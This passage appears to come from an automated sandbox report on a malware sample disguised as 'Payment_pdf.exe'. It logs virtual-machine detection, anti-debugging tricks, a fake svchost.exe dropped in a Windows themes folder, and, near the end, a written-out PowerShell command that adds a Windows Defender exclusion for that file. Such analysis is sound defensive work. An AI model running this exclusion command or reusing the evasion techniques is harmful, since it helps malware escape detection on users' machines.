                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\Payment_pdf.exeCode function: 0_2_00256F08 sgdt fword ptr [eax]
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5483
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1514
                  Source: C:\Users\user\Desktop\Payment_pdf.exeWindow / User API: threadDelayed 1898
                  Source: C:\Users\user\Desktop\Payment_pdf.exeWindow / User API: threadDelayed 7904
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4440Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\Payment_pdf.exe TID: 5852Thread sleep time: -17524406870024063s >= -30000s
                  Source: C:\Users\user\Desktop\Payment_pdf.exe TID: 3312Thread sleep count: 1898 > 30
                  Source: C:\Users\user\Desktop\Payment_pdf.exe TID: 3312Thread sleep count: 7904 > 30
                  Source: C:\Users\user\Desktop\Payment_pdf.exe TID: 5852Thread sleep count: 39 > 30
                  Source: C:\Windows\System32\svchost.exe TID: 5728Thread sleep time: -240000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7008Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Users\user\Desktop\Payment_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeLast function: Thread delayed
                  Source: powershell.exe, 00000005.00000003.499537391.0000000004F9D000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                  Source: svchost.exe, 00000004.00000002.357570745.000001AC69140000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.416437260.000001BCBD740000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.493124161.0000000001270000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.447862433.00000152D7E60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: WerFault.exe, 0000000F.00000002.492935514.00000000011B7000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.510562184.00000250274EE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: Payment_pdf.exe, 00000000.00000002.408285568.0000000000A2D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                  Source: svchost.exe, 00000004.00000002.357570745.000001AC69140000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.416437260.000001BCBD740000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.493124161.0000000001270000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.447862433.00000152D7E60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: svchost.exe, 00000004.00000002.357570745.000001AC69140000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.416437260.000001BCBD740000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.493124161.0000000001270000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.447862433.00000152D7E60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: explorer.exe, 00000016.00000002.619270088.00000000012F9000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: svchost.exe, 00000004.00000002.357570745.000001AC69140000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.416437260.000001BCBD740000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.493124161.0000000001270000.00000002.00000001.sdmp, svchost.exe, 00000017.00000002.447862433.00000152D7E60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: powershell.exe, 00000005.00000003.499537391.0000000004F9D000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information queried: ProcessInformation

                  Anti Debugging:

                  barindex
                  Hides threads from debuggersShow sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeThread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess token adjusted: Debug
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess token adjusted: Debug
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Payment_pdf.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeNetwork Connect: 172.67.172.17 80
                  Adds a directory exclusion to Windows DefenderShow sources
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe' -Force
